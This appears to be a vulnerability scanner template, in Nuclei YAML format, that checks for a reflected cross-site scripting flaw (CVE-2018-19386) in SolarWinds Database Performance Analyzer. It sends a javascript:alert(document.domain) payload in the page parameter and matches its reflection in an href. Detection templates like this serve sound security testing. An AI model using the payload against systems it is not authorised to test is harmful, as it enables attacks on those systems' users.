id: CVE-2018-19386

info:
  name: SolarWinds Database Performance Analyzer 11.1. 457 - Cross Site Scripting
  author: pikpikcu
  severity: medium
  reference: https://www.cvedetails.com/cve/CVE-2018-19386/
  tags: cve,cve2018,solarwinds,xss
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.10
    cve-id: CVE-2018-19386
    cwe-id: CWE-79
  description: "SolarWinds Database Performance Analyzer 11.1.457 contains an instance of Reflected XSS in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI."

requests:
  - method: GET
    path:
      - "{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - '<a href="javascript:alert(document.domain)//'